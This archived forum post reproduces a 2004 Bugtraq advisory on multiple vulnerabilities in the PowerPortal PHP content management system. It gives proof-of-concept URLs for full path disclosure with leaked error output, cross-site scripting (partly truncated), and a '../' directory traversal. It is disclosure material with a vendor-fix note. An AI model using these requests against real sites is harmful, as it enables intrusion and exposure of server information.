hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Multiple Vulnerabilities Powerportal
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Jun 28 2004, 05:40 PM
QUOTE


PROGRAM: PowerPortal
  HOMEPAGE: http://powerportal.sourceforge.net/
  VERSION: v1.x
  BUG: Multiple vulnerabilities
  DATE: 23/05/2004
  AUTHOR: DarkBicho
-----------------------------------------------------------------------------------------------


1.- Affected software description:
    ------------------------------
  PowerPortal is a popular content management system, written in php

2.- Vulnerabilities:
    ---------------

A. Full path disclosure:


    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.
   
    :.: Examples:


    * http://attacker/modules/gallery/resize.php


    <br />
    <b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>18</b><br />
    <br />
    <b>Warning</b>: imagecopyresized(): supplied argument is not a
    valid Image resource in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>20</b><br />
    <br />
    <b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
    resource in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>23</b><br />



    * http://attacker/power/modules.php?name=gal...files=darkbicho


    Warning:
    opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
    failed to open dir: Invalid argument in
    c:\appserv\www\power\modules\gallery\index.php on
    line 99



B. Cross-Site Scripting aka XSS:



http://attacker/modules.php?name=private_m...</script>
http://attacker/modules.php?name=links&sea...=search_results
http://attacker/modules.php?name=content&f...t;&func=results
http://attacker/modules.php?name=gallery&f...</script>


  C. Arbitrary directory browsing:



    * http://attacker/modules.php?name=gallery&files=/../../../



3.- SOLUTION:
    จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the PowerPortal website for updates and official release
    details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------


        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho_at_peru.com



Source: http://seclists.org/lists/bugtraq/2004/Jun/0445.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.